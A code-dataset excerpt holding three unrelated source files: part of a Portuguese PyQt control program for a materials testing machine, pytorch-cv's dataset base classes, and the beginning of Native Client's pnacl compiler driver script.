webc.main(imagesavedir,cameras[ind])
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MET", None))
self.pushButton.setText(_translate("MainWindow", "Iniciar Ensaio", None))
self.pushButton.setStyleSheet('color: Blue')
self.pushButton.clicked.connect(self.iniciar)
self.button_webcam.setText(_translate("MainWindow", "Imagem capture", None))
self.button_webcam.clicked.connect(self.webcamcapture)
self.bcal.setText(_translate("MainWindow", "Adicionar Nova", None))
self.bcal.clicked.connect(self.add_nova)
self.scal.setText(_translate("MainWindow", "Selecionar Celula", None))
self.scal.clicked.connect(self.selecionar)
self.ecal.setText(_translate("MainWindow", "Editar/Calibrar", None))
self.ecal.clicked.connect(self.Editar)
self.label.setText(_translate("MainWindow", "Tipo de ensaio:", None))
self.checkBox.setText(_translate("MainWindow", "Ensaio de tração", None))
self.checkBox.setChecked(True)
self.checkBox_2.setText(_translate("MainWindow", "Ensaio de compressão", None))
self.label_2.setText(_translate("MainWindow", "Velocidade de ensaio", None))
self.label_3.setText(_translate("MainWindow", "mm/min", None))
self.checkBox_3.setText(_translate("MainWindow", "Parada queda de Força ",None))
self.label_4.setText(_translate("MainWindow", "Parada automatica", None))
self.label_5.setText(_translate("MainWindow", "% de Força", None))
self.checkBox_4.setText(_translate("MainWindow", "Parada de Força maxima", None))
self.label_6.setText(_translate("MainWindow", "Força maxima", None))
self.checkBox_5.setText(_translate("MainWindow", "Parada deslocamento", None))
self.label_7.setText(_translate("MainWindow", "Deslocamento Máximo", None))
self.label_8.setText(_translate("MainWindow", "N", None))
self.label_9.setText(_translate("MainWindow", "mm", None))
self.label_10.setText(_translate("MainWindow", "Ajustes Manuais", None))
self.desl.setText(_translate("MainWindow", "deslocamento", None))
self.label_11.setText(_translate("MainWindow", "Velocidade do ajuste", None))
self.label_12.setText(_translate("MainWindow", "mm/min", None))
self.deslm.setText(_translate("MainWindow", "mm", None))
self.botaodiretorio.setText(_translate("MainWindow", "Relatórios", None))
self.botaodiretorio.clicked.connect(self.relatorios)
self.botaodiretorio.show()
self.botaobrowser.setText(_translate("MainWindow", "Browser Ensaio", None))
self.botaobrowser.clicked.connect(self.func_browser)
self.botaobrowser.show()
self.pushButton_2.setText(_translate("MainWindow", "Descer", None))
self.pushButton_2.clicked.connect(self.Descer)
self.pushButton_3.setText(_translate("MainWindow", "Subir", None))
self.pushButton_3.clicked.connect(self.Subir)
self.parar_ajuste.setText(_translate("MainWindow", "Parar", None))
self.parar_ajuste.clicked.connect(self.Parando2)
self.label_13.setText(_translate("MainWindow", "Àrea de Seção do Corpo de Prova", None))
self.checkBox_6.setText(_translate("MainWindow", "Retangular", None))
self.checkBox_7.setText(_translate("MainWindow", "Tubo", None))
self.checkBox_8.setText(_translate("MainWindow", "Cilíndrico", None))
self.label_15.setText(_translate("MainWindow", "L", None))
self.label_16.setText(_translate("MainWindow", "l", None))
self.label_17.setText(_translate("MainWindow", "L", None))
self.label_18.setText(_translate("MainWindow", "D", None))
self.label_19.setText(_translate("MainWindow", "D", None))
self.label_20.setText(_translate("MainWindow", "H", None))
self.pushButton_4.setText(_translate("MainWindow", "Emergência", None))
self.pushButton_4.setStyleSheet('color: red')
self.pushButton_4.clicked.connect(self.Parando)
self.emergrafic.setText(_translate("MainWindow", "Emergência", None))
self.emergrafic.setStyleSheet('color: red')
self.emergrafic.clicked.connect(self.Parando)
self.Config.setTabText(self.Config.indexOf(self.Config_2), _translate("MainWindow", "Configurações", None))
self.label_21.setText(_translate("MainWindow", "Deslocamento", None))
self.label_22.setText(_translate("MainWindow", "Força", None))
self.label_23.setText(_translate("MainWindow", "mm", None))
self.label_24.setText(_translate("MainWindow", "N", None))
self.pushButton_5.setText(_translate("MainWindow", "Reset Gráfico", None))
self.pushButton_5.clicked.connect(self.resetgrafic)
self.pushButton_6.setText(_translate("MainWindow", "Cancelar Test", None))
self.pushButton_6.clicked.connect(self.cancelartestes)
self.pushButton_7.setText(_translate("MainWindow", "Gerar Relátorio", None))
self.pushButton_7.clicked.connect(self.gerarpdf)
self.Config.setTabText(self.Config.indexOf(self.Grafic), _translate("MainWindow", "Gráfico", None))
self.Config.setTabText(self.Config.indexOf(self.Calibra), _translate("MainWindow", "Celula de Carga", None))
self.pushButton_6.hide()
self.pushButton_7.hide()
        # Load cell ("Celula de Carga") widgets
self.obs.setText(_translate("MainWindow", "OBS: Retire as Garras/Mordentes da Celula de Carga, Não deixe nada apenas a Celula de Carga, Clique em Iniciar.", None))
self.combo.hide()
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
self.combo.hide()
#self.label12.hide()
class MyForm(QtWidgets.QMainWindow):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
def closeEvent(self,event):
result = QtWidgets.QMessageBox.question(self,
"Confirmar Fechamento do Programa...",
"Você deseja realmente sair do programa ?",
QtWidgets.QMessageBox.Yes| QtWidgets.QMessageBox.No)
event.ignore()
if result == QtWidgets.QMessageBox.Yes:
      global flag2  # the stop flag lives at module level; declare it so this assignment reaches the worker loop
      flag2 = 0
      Motor.Parar()
      event.accept()
class ServerThread(QtCore.QThread):
UPsig = QtCore.pyqtSignal(list)
Stopsig =QtCore.pyqtSignal(int)
def __init__(self, parent=None):
QtCore.QThread.__init__(self)
def start_server(self):
global flag
global VelocidadeEn
global qforca
global maxforca
global maxdeslocamento
global tempinicioteste
global forcas
global deslocamentos
tempo = time.time()
if(flag == 0):
global flag2
while(flag2 == 1):
QtTest.QTest.qWait(500)
flag =1
Forca = celula.getvalue()
if Forca == None:
Forca = 0
pass
'''self.aviso= QtWidgets.QMessageBox()
self.aviso.setText("Por Favor verifique o HX711, aparentemente o mesmo encontra-se desconnectado !")
self.aviso.addButton(QtWidgets.QMessageBox.Yes)
result1 = self.aviso.exec_()'''
else:
tempodecorrido = (time.time() - tempinicioteste)/60
deslocamento = (float(VelocidadeEn))*float(tempodecorrido)
deslocamentos.append(deslocamento)
forcas.append((float(Forca)*9.8))
forcaanterior = forcas[-1]
maiorvalor = forcas.copy()
maiorvalor.sort()
if( time.time()- tempo > 0.8):
lista = [float(deslocamento),float(Forca),float(maiorvalor[-1])+30,float(deslocamentos[-1])+30,deslocamentos,forcas]
#self.emit(QtCore.SIGNAL("UP"), lista)
self.UPsig.emit(lista)
tempo = time.time()
if( flag2 == 1 and maxdeslocamento != None and float(maxdeslocamento) != 0 and float(deslocamento) >= float(maxdeslocamento)):
flag2 =0
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
#self.emit(QtCore.SIGNAL("UP"), lista)
self.UPsig.emit(lista)
if(flag2 == 1 and maxforca != None and float(maxforca) != 0 and float(Forca) >= float(maxforca)):
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
flag2 =0
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
self.UPsig.emit(lista)
#self.emit(QtCore.SIGNAL("UP"), lista)
if(flag2 == 1 and qforca != None and float(qforca) != 0 and (float(forcaanterior)*(1 - (float(qforca)/100))) > Forca ):
flag2 =0
for i in range(0,10):
QtTest.QTest.qWait(20)
Forca = celula.getvalue()
tempodecorrido = (time.time() - tempinicioteste)/60
deslocamento = (float(VelocidadeEn))*float(tempodecorrido)
deslocamentos.append(deslocamento)
forcas.append((float(Forca)*9.8))
forcaanterior = forcas[-1]
maiorvalor = forcas.copy()
maiorvalor.sort()
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
self.UPsig.emit(lista)
#self.emit(QtCore.SIGNAL("UP"), lista)
flag =0
def run(self):
self.start_server()
def Area(Retangulo_A,Retangulo_B,Tubo_L,Tubo_D,Cilindro_D,Cilindro_H):
global AreaCorpoProva
global FormatoCorpoProva
FormatoCorpoProva = ""
AreaCorpoProva = 0.0
if(Retangulo_A != None and Retangulo_B != None):
        # compute the cross-sectional area of a rectangular specimen (L * l)
        AreaCorpoProva = float(Retangulo_A) * float(Retangulo_B)
        FormatoCorpoProva = "Retangular"  # record the shape, mirroring the Tubo / Cilindrico branches
if(Tubo_L != None and Tubo_D != None):
AreaCorpoProva = math.pi * float(Tubo_L)* float(Tubo_D)
FormatoCorpoProva = "Tubo"
if(Cilindro_D != None and Cilindro_H != None):
AreaCorpoProva = (math.pi*((float(Cilindro_D)*float(Cilindro_H))))+ 2*(math.pi*(float(Cilindro_D)*float(Cilindro_D))/4)
FormatoCorpoProva = "Cilíndrico"
def lotes(nome,x1,x2):
global contando
global testes
global AreaCorpoProva
global VelocidadeEn
global tipodeensaio
global FormatoCorpoProva
testes.append({})
nome=nome+str(contando)
testes[contando]["nome"] = nome
testes[contando]["area"] = AreaCorpoProva
testes[contando]["vel"] = VelocidadeEn
testes[contando]["formato"] = FormatoCorpoProva
testes[contando]["tipo"] =tipodeensaio
testes[contando]["cont"] = contando
testes[contando]["x1"] = x1
testes[contando]["x2"] = x2
contando+=1
if __name__ == "__main__":
app =QtWidgets.QApplication(sys.argv)
myapp = MyForm()
myapp.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
ccc95a8679b749bc527794939994aee82257f6dd | 1d182c8cf1ce19019e0b1cba4a16ee1a2a49751e | /data/base.py | d4e7c2318658561292e5f341ea1513223aa70af8 | [
"MIT"
] | permissive | zxt881108/pytorch-cv | e30ac8638a8819b637c6bbef717f733264229126 | 6f2d1760f12c9a56a3e7b19ba74bc41451ea284c | refs/heads/master | 2020-06-18T18:16:09.741626 | 2019-04-29T14:11:06 | 2019-04-29T14:11:06 | 196,396,348 | 5 | 0 | null | 2019-07-11T13:06:29 | 2019-07-11T13:06:28 | null | UTF-8 | Python | false | false | 4,270 | py | """Base dataset methods."""
import os
from torch.utils import data
class ClassProperty(object):
"""Readonly @ClassProperty descriptor for internal usage."""
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
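# Usage sketch: ClassProperty exposes a read-only, class-level attribute computed from the
# class object itself; the names below are illustrative only, not part of this module:
#   class Example(object):
#       @ClassProperty
#       def CLASSES(cls):
#           return ('cat', 'dog')
#   Example.CLASSES  # -> ('cat', 'dog'), accessible without creating an instance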
class SimpleDataset(data.Dataset):
"""Simple Dataset wrapper for lists and arrays.
Parameters
----------
data : dataset-like object
Any object that implements `len()` and `[]`.
"""
def __init__(self, data):
self._data = data
def __len__(self):
return len(self._data)
def __getitem__(self, idx):
return self._data[idx]
class _LazyTransformDataset(data.Dataset):
"""Lazily transformed dataset."""
def __init__(self, data, fn):
super(_LazyTransformDataset, self).__init__()
self._data = data
self._fn = fn
def __len__(self):
return len(self._data)
def __getitem__(self, idx):
item = self._data[idx]
if isinstance(item, tuple):
return self._fn(*item)
return self._fn(item)
def transform(self, fn):
self._fn = fn
class VisionDataset(data.Dataset):
"""Base Dataset with directory checker.
Parameters
----------
root : str
The root path of xxx.names, by default is '~/.mxnet/datasets/foo', where
`foo` is the name of the dataset.
"""
def __init__(self, root):
super(VisionDataset, self).__init__()
if not os.path.isdir(os.path.expanduser(root)):
helper_msg = "{} is not a valid dir. Did you forget to initialize \
datasets described in: \
`http://gluon-cv.mxnet.io/build/examples_datasets/index.html`? \
You need to initialize each dataset only once.".format(root)
raise OSError(helper_msg)
@property
def classes(self):
raise NotImplementedError
@property
def num_class(self):
"""Number of categories."""
return len(self.classes)
def transform(self, fn, lazy=True):
"""Returns a new dataset with each sample transformed by the
transformer function `fn`.
Parameters
----------
fn : callable
A transformer function that takes a sample as input and
returns the transformed sample.
lazy : bool, default True
If False, transforms all samples at once. Otherwise,
transforms each sample on demand. Note that if `fn`
is stochastic, you must set lazy to True or you will
get the same result on all epochs.
Returns
-------
Dataset
The transformed dataset.
"""
trans = _LazyTransformDataset(self, fn)
if lazy:
return trans
return SimpleDataset([i for i in trans])
#### for debug (Note: delete)
from PIL import Image
import numpy as np
class DemoDataset(data.Dataset):
"""Simple Dataset wrapper for lists and arrays.
Parameters
----------
data : dataset-like object
Any object that implements `len()` and `[]`.
"""
def __init__(self, num):
self._num = num
def __len__(self):
return self._num
def __getitem__(self, idx):
return Image.fromarray(np.random.randint(0, 255, size=(60, 60, 3)).astype(np.uint8))
def transform(self, fn, lazy=True):
"""Returns a new dataset with each sample transformed by the
transformer function `fn`.
Parameters
----------
fn : callable
A transformer function that takes a sample as input and
returns the transformed sample.
lazy : bool, default True
If False, transforms all samples at once. Otherwise,
transforms each sample on demand. Note that if `fn`
is stochastic, you must set lazy to True or you will
get the same result on all epochs.
Returns
-------
Dataset
The transformed dataset.
"""
trans = _LazyTransformDataset(self, fn)
if lazy:
return trans
return SimpleDataset([i for i in trans])
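# Minimal usage sketch of the lazy vs. eager transform() API; DemoDataset yields random PIL
# images, so the numbers printed are arbitrary and only illustrate the mechanics:
if __name__ == "__main__":
    demo = DemoDataset(4)
    lazy_view = demo.transform(lambda img: np.asarray(img).mean())               # applied on access
    eager_view = demo.transform(lambda img: np.asarray(img).mean(), lazy=False)  # applied up front
    print(len(lazy_view), float(lazy_view[0]), float(eager_view[0]))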
| [
"[email protected]"
] | |
96740a5818f496c48cced1e2c40379baf0a7e573 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /native_client/pnacl/driver/pnacl-driver.py | 2ac806f22b80cbb2246dd980fe3d41b59f3c1040 | [
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 29,863 | py | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import subprocess
from driver_tools import AddHostBinarySearchPath, DefaultOutputName, \
DefaultPCHOutputName, DriverChain, GetArch, ParseArgs, ParseTriple, \
Run, RunDriver, RunWithEnv, TempNameGen, UnrecognizedOption
from driver_env import env
from driver_log import DriverOpen, Log
import filetype
import pathtools
EXTRA_ENV = {
'ALLOW_TRANSLATE': '0', # Allow bitcode translation before linking.
# It doesn't normally make sense to do this.
'ALLOW_NATIVE' : '0', # Allow native objects (.S,.s,.o) to be in the
# linker line for .pexe generation.
# It doesn't normally make sense to do this.
# CXX_EH_MODE specifies how to deal with C++ exception handling:
# * 'none': Strips out use of C++ exception handling.
# * 'sjlj': Enables the setjmp()+longjmp()-based implementation of
# C++ exception handling.
'CXX_EH_MODE': 'none',
'FORCE_INTERMEDIATE_LL': '0',
# Produce an intermediate .ll file
# Useful for debugging.
# NOTE: potentially different code paths and bugs
# might be triggered by this
'LANGUAGE' : '', # C or CXX (set by SetTool)
'INCLUDE_CXX_HEADERS': '0', # This is set by RunCC.
# Command-line options
'GCC_MODE' : '', # '' (default), '-E', '-c', or '-S'
'SHARED' : '0', # Identify if the target is a shared library.
'STDINC' : '1', # Include standard headers (-nostdinc sets to 0)
'STDINCCXX' : '1', # Include standard cxx headers (-nostdinc++ sets to 0)
'USE_STDLIB' : '1', # Include standard libraries (-nostdlib sets to 0)
'STDLIB' : 'libc++', # C++ Standard Library.
'DEFAULTLIBS' : '1', # Link with default libraries
'DIAGNOSTIC' : '0', # Diagnostic flag detected
'PIC' : '0', # Generate PIC
'NEED_DASH_E' : '0', # Used for stdin inputs, which must have an explicit
# type set (using -x) unless -E is specified.
'VERBOSE' : '0', # Verbose (-v)
'SHOW_VERSION': '0', # Version (--version)
'PTHREAD' : '0', # use pthreads?
'INPUTS' : '', # Input files
'OUTPUT' : '', # Output file
'UNMATCHED' : '', # Unrecognized parameters
'BIAS_NONE' : '',
'BIAS_ARM' : '-D__arm__ -D__ARM_ARCH_7A__ -D__ARMEL__',
'BIAS_MIPS32' : '-D__mips__',
'BIAS_X8632' : '-D__i386__ -D__i386 -D__i686 -D__i686__ -D__pentium4__',
'BIAS_X8664' : '-D__amd64__ -D__amd64 -D__x86_64__ -D__x86_64 -D__core2__',
'BIAS_ARM_NONSFI': '${BIAS_ARM} -D__native_client_nonsfi__',
'BIAS_X8632_NONSFI': '${BIAS_X8632} -D__native_client_nonsfi__',
'FRONTEND_TRIPLE' : 'le32-unknown-nacl',
'OPT_LEVEL' : '', # Default for most tools is 0, but we need to know
# if it's explicitly set or not when the driver
# is only used for linking + translating.
'CC_FLAGS' : '-O${#OPT_LEVEL ? ${OPT_LEVEL} : 0} ' +
'-fno-vectorize -fno-slp-vectorize ' +
'-fno-common ${PTHREAD ? -pthread} ' +
'-nostdinc ${BIAS_%BIAS%} ' +
'-fno-gnu-inline-asm ' +
'-target ${FRONTEND_TRIPLE} ' +
'${IS_CXX ? -fexceptions}',
'ISYSTEM' : '${ISYSTEM_USER} ${STDINC ? ${ISYSTEM_BUILTIN}}',
'ISYSTEM_USER' : '', # System include directories specified by
# using the -isystem flag.
'ISYSTEM_BUILTIN':
'${BASE_USR}/usr/include ' +
'${ISYSTEM_CLANG} ' +
'${ISYSTEM_CXX} ' +
'${BASE_USR}/include ' +
'${BASE_SDK}/include ',
'ISYSTEM_CLANG' : '${BASE_LLVM}/lib/clang/${CLANG_VER}/include',
'ISYSTEM_CXX' :
'${INCLUDE_CXX_HEADERS && STDINCCXX ? ${ISYSTEM_CXX_include_paths}}',
'ISYSTEM_CXX_include_paths' : '${BASE_USR}/include/c++/v1',
# Only propagate opt level to linker if explicitly set, so that the
# linker will know if an opt level was explicitly set or not.
'LD_FLAGS' : '${#OPT_LEVEL ? -O${OPT_LEVEL}} ' +
'${SHARED ? -shared : -static} ' +
'${PIC ? -fPIC} ${@AddPrefix:-L:SEARCH_DIRS} ' +
'--pnacl-exceptions=${CXX_EH_MODE}',
'SEARCH_DIRS' : '', # Directories specified using -L
# Library Strings
'EMITMODE' : '${!USE_STDLIB || SHARED ? nostdlib : static}',
# This is setup so that LD_ARGS_xxx is evaluated lazily.
'LD_ARGS' : '${LD_ARGS_%EMITMODE%}',
# ${ld_inputs} signifies where to place the objects and libraries
# provided on the command-line.
'LD_ARGS_nostdlib': '-nostdlib ${ld_inputs}',
'LD_ARGS_static':
'-l:crt1.x -l:crti.bc -l:crtbegin.bc '
'${CXX_EH_MODE==sjlj ? -l:sjlj_eh_redirect.bc : '
'${CXX_EH_MODE==none ? -l:unwind_stubs.bc}} ' +
'${ld_inputs} ' +
'--start-group ${STDLIBS} --end-group',
'LLVM_PASSES_TO_DISABLE': '',
# Flags for translating to native .o files.
'TRANSLATE_FLAGS' : '-O${#OPT_LEVEL ? ${OPT_LEVEL} : 0}',
'STDLIBS' : '${DEFAULTLIBS ? '
'${LIBSTDCPP} ${LIBPTHREAD} ${LIBNACL} ${LIBC} '
'${LIBGCC_BC} ${LIBPNACLMM}}',
'LIBSTDCPP' : '${IS_CXX ? -lc++ -lm -lpthread }',
# The few functions in the bitcode version of compiler-rt unfortunately
# depend on libm. TODO(jvoung): try rewriting the compiler-rt functions
# to be standalone.
'LIBGCC_BC' : '-lgcc -lm',
'LIBC' : '-lc',
'LIBNACL' : '-lnacl',
'LIBPNACLMM': '-lpnaclmm',
# Enabled/disabled by -pthreads
'LIBPTHREAD': '${PTHREAD ? -lpthread}',
# IS_CXX is set by pnacl-clang and pnacl-clang++ programmatically
'CC' : '${IS_CXX ? ${CLANGXX} : ${CLANG}}',
'RUN_CC': '${CC} ${emit_llvm_flag} ${mode} ${CC_FLAGS} ' +
'${@AddPrefix:-isystem :ISYSTEM} ' +
'-x${typespec} ${infile} -o ${output}',
}
def AddLLVMPassDisableFlag(*args):
env.append('LLVM_PASSES_TO_DISABLE', *args)
env.append('LD_FLAGS', *args)
def AddLDFlag(*args):
env.append('LD_FLAGS', *args)
def AddTranslatorFlag(*args):
# pass translator args to ld in case we go all the way to .nexe
env.append('LD_FLAGS', *['-Wt,' + a for a in args])
# pass translator args to translator in case we go to .o
env.append('TRANSLATE_FLAGS', *args)
def AddCCFlag(*args):
env.append('CC_FLAGS', *args)
def AddDiagnosticFlag(*args):
env.append('CC_FLAGS', *args)
env.set('DIAGNOSTIC', '1')
def SetTarget(*args):
arch = ParseTriple(args[0])
env.set('FRONTEND_TRIPLE', args[0])
AddLDFlag('--target=' + args[0])
def SetStdLib(*args):
"""Set the C++ Standard Library."""
lib = args[0]
if lib != 'libc++':
Log.Fatal('Only libc++ is supported as standard library')
def IsPortable():
return env.getone('FRONTEND_TRIPLE').startswith('le32-')
stdin_count = 0
def AddInputFileStdin():
global stdin_count
# When stdin is an input, -x or -E must be given.
forced_type = filetype.GetForcedFileType()
if not forced_type:
# Only allowed if -E is specified.
forced_type = 'c'
env.set('NEED_DASH_E', '1')
stdin_name = '__stdin%d__' % stdin_count
env.append('INPUTS', stdin_name)
filetype.ForceFileType(stdin_name, forced_type)
stdin_count += 1
def IsStdinInput(f):
return f.startswith('__stdin') and f.endswith('__')
def HandleDashX(arg):
if arg == 'none':
filetype.SetForcedFileType(None)
return
filetype.SetForcedFileType(filetype.GCCTypeToFileType(arg))
def AddVersionFlag(*args):
env.set('SHOW_VERSION', '1')
AddDiagnosticFlag(*args)
def AddBPrefix(prefix):
""" Add a path to the list searched for host binaries and include dirs. """
AddHostBinarySearchPath(prefix)
prefix = pathtools.normalize(prefix)
if pathtools.isdir(prefix) and not prefix.endswith('/'):
prefix += '/'
# Add prefix/ to the library search dir if it exists
if pathtools.isdir(prefix):
env.append('SEARCH_DIRS', prefix)
# Add prefix/include to isystem if it exists
include_dir = prefix + 'include'
if pathtools.isdir(include_dir):
env.append('ISYSTEM_USER', include_dir)
CustomPatterns = [
( '--driver=(.+)', "env.set('CC', pathtools.normalize($0))\n"),
( '--pnacl-allow-native', "env.set('ALLOW_NATIVE', '1')"),
( '--pnacl-allow-translate', "env.set('ALLOW_TRANSLATE', '1')"),
( '--pnacl-frontend-triple=(.+)', SetTarget),
( ('-target','(.+)'), SetTarget),
( ('--target=(.+)'), SetTarget),
( '--pnacl-exceptions=(none|sjlj)', "env.set('CXX_EH_MODE', $0)"),
( '(--pnacl-allow-nexe-build-id)', AddLDFlag),
( '(--pnacl-disable-abi-check)', AddLDFlag),
( '(--pnacl-disable-pass=.+)', AddLLVMPassDisableFlag),
]
GCCPatterns = [
( '-o(.+)', "env.set('OUTPUT', pathtools.normalize($0))"),
( ('-o', '(.+)'), "env.set('OUTPUT', pathtools.normalize($0))"),
( '-E', "env.set('GCC_MODE', '-E')"),
( '-S', "env.set('GCC_MODE', '-S')"),
( '-c', "env.set('GCC_MODE', '-c')"),
( '-nostdinc', "env.set('STDINC', '0')"),
( '-nostdinc\+\+', "env.set('STDINCCXX', '0')"),
( '-nostdlib', "env.set('USE_STDLIB', '0')"),
( '-nodefaultlibs', "env.set('DEFAULTLIBS', '0')"),
( '-?-stdlib=(.*)', SetStdLib),
( ('-?-stdlib', '(.*)'), SetStdLib),
# Flags to pass to native linker
( '(-Wn,.*)', AddLDFlag),
( '-rdynamic', "env.append('LD_FLAGS', '-export-dynamic')"),
# Flags to pass to pnacl-translate
( '-Wt,(.*)', AddTranslatorFlag),
( ('-Xtranslator','(.*)'), AddTranslatorFlag),
# We don't care about -fPIC, but pnacl-ld and pnacl-translate do.
( '-fPIC', "env.set('PIC', '1')"),
# We must include -l, -Xlinker, and -Wl options into the INPUTS
# in the order they appeared. This is the exactly behavior of gcc.
# For example: gcc foo.c -Wl,--start-group -lx -ly -Wl,--end-group
#
( '(-l.+)', "env.append('INPUTS', $0)"),
( ('(-l)','(.+)'), "env.append('INPUTS', $0+$1)"),
( ('-Xlinker','(.*)'), "env.append('INPUTS', '-Xlinker=' + $0)"),
( '(-Wl,.*)', "env.append('INPUTS', $0)"),
( '(-Bstatic)', "env.append('INPUTS', $0)"),
( '(-Bdynamic)', "env.append('INPUTS', $0)"),
( '-O([sz])', "env.set('OPT_LEVEL', $0)\n"),
( '-O([0-3])', "env.set('OPT_LEVEL', $0)\n"),
( '-O([0-9]+)', "env.set('OPT_LEVEL', '3')\n"),
( '-O', "env.set('OPT_LEVEL', '1')\n"),
( ('-isystem', '(.*)'),
"env.append('ISYSTEM_USER', pathtools.normalize($0))"),
( '-isystem(.+)',
"env.append('ISYSTEM_USER', pathtools.normalize($0))"),
( ('-I', '(.+)'), "env.append('CC_FLAGS', '-I'+pathtools.normalize($0))"),
( '-I(.+)', "env.append('CC_FLAGS', '-I'+pathtools.normalize($0))"),
# -I is passed through, so we allow -isysroot and pass it through as well.
# However -L is intercepted and interpreted, so it would take more work
# to handle -sysroot w/ libraries.
( ('-isysroot', '(.+)'),
"env.append('CC_FLAGS', '-isysroot ' + pathtools.normalize($0))"),
( '-isysroot(.+)',
"env.append('CC_FLAGS', '-isysroot ' + pathtools.normalize($0))"),
# NOTE: the -iquote =DIR syntax (substitute = with sysroot) doesn't work.
# Clang just says: ignoring nonexistent directory "=DIR"
( ('-iquote', '(.+)'),
"env.append('CC_FLAGS', '-iquote', pathtools.normalize($0))"),
( ('-iquote(.+)'),
"env.append('CC_FLAGS', '-iquote', pathtools.normalize($0))"),
( ('-idirafter', '(.+)'),
"env.append('CC_FLAGS', '-idirafter'+pathtools.normalize($0))"),
( '-idirafter(.+)',
"env.append('CC_FLAGS', '-idirafter'+pathtools.normalize($0))"),
( ('(-include)','(.+)'), AddCCFlag),
( ('(-include.+)'), AddCCFlag),
( '(--relocatable-pch)', AddCCFlag),
( '(-g)', AddCCFlag),
( '(-W.*)', AddCCFlag),
( '(-w)', AddCCFlag),
( '(-std=.*)', AddCCFlag),
( '(-ansi)', AddCCFlag),
( ('(-D)','(.*)'), AddCCFlag),
( '(-D.+)', AddCCFlag),
( ('(-U)','(.*)'), AddCCFlag),
( '(-U.+)', AddCCFlag),
( '(-f.*)', AddCCFlag),
( '(-pedantic)', AddCCFlag),
( '(-pedantic-errors)', AddCCFlag),
( '(-g.*)', AddCCFlag),
( '(-v|--v)', "env.append('CC_FLAGS', $0)\n"
"env.set('VERBOSE', '1')"),
( '(-pthreads?)', "env.set('PTHREAD', '1')"),
# No-op: accepted for compatibility in case build scripts pass it.
( '-static', ""),
( ('-B','(.*)'), AddBPrefix),
( ('-B(.+)'), AddBPrefix),
( ('-L','(.+)'), "env.append('SEARCH_DIRS', pathtools.normalize($0))"),
( '-L(.+)', "env.append('SEARCH_DIRS', pathtools.normalize($0))"),
( '(-Wp,.*)', AddCCFlag),
( '(-Xpreprocessor .*)', AddCCFlag),
( ('(-Xclang)', '(.*)'), AddCCFlag),
# Accept and ignore default flags
( '-m32', ""),
( '-emit-llvm', ""),
( '(-MG)', AddCCFlag),
( '(-MMD)', AddCCFlag),
( '(-MM?)', "env.append('CC_FLAGS', $0)\n"
"env.set('GCC_MODE', '-E')"),
( '(-MP)', AddCCFlag),
( ('(-MQ)','(.*)'), AddCCFlag),
( '(-MD)', AddCCFlag),
( ('(-MT)','(.*)'), AddCCFlag),
( ('(-MF)','(.*)'), "env.append('CC_FLAGS', $0, pathtools.normalize($1))"),
( ('-x', '(.+)'), HandleDashX),
( '-x(.+)', HandleDashX),
( ('(-mllvm)', '(.+)'), AddCCFlag),
# Ignore these gcc flags
( '(-msse)', ""),
( '(-march=armv7-a)', ""),
( '(-pipe)', ""),
( '(-shared)', "env.set('SHARED', '1')"),
( '(-s)', AddLDFlag),
( '(--strip-all)', AddLDFlag),
( '(--strip-debug)', AddLDFlag),
# Ignore these assembler flags
( '(-Qy)', ""),
( ('(--traditional-format)', '.*'), ""),
( '(-gstabs)', ""),
( '(--gstabs)', ""),
( '(-gdwarf2)', ""),
( '(--gdwarf2)', ""),
( '(--fatal-warnings)', ""),
( '(-meabi=.*)', ""),
( '(-mfpu=.*)', ""),
( '(-mfloat-abi=.+)', AddCCFlag),
# GCC diagnostic mode triggers
( '(-print-.*)', AddDiagnosticFlag),
( '(--print.*)', AddDiagnosticFlag),
( '(-dumpspecs)', AddDiagnosticFlag),
( '(--version)', AddVersionFlag),
# These are preprocessor flags which should be passed to the frontend, but
# should not prevent the usual -i flags (which DIAGNOSTIC mode does)
( '(-d[DIMNU])', AddCCFlag),
( '(-d.*)', AddDiagnosticFlag),
# Catch all other command-line arguments
( '(-.+)', "env.append('UNMATCHED', $0)"),
# Standard input
( '-', AddInputFileStdin),
# Input Files
# Call ForceFileType for all input files at the time they are
# parsed on the command-line. This ensures that the gcc "-x"
# setting is correctly applied.
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))\n"
"filetype.ForceFileType(pathtools.normalize($0))"),
]
def CheckSetup():
if not env.has('IS_CXX'):
Log.Fatal('"pnacl-driver" cannot be used directly. '
'Use pnacl-clang or pnacl-clang++.')
def DriverOutputTypes(driver_flag, compiling_to_native):
output_type_map = {
('-E', False) : 'pp',
('-E', True) : 'pp',
('-c', False) : 'po',
('-c', True) : 'o',
('-S', False) : 'll',
('-S', True) : 's',
('', False) : 'pexe',
('', True) : 'nexe',
}
return output_type_map[(driver_flag, compiling_to_native)]
def ReadDriverRevision():
rev_file = env.getone('DRIVER_REV_FILE')
nacl_ver = DriverOpen(rev_file, 'rb').readlines()[0]
m = re.search(r'\[GIT\].*/native_client(?:\.git)?:\s*([0-9a-f]{40})',
nacl_ver)
if m:
return m.group(1)
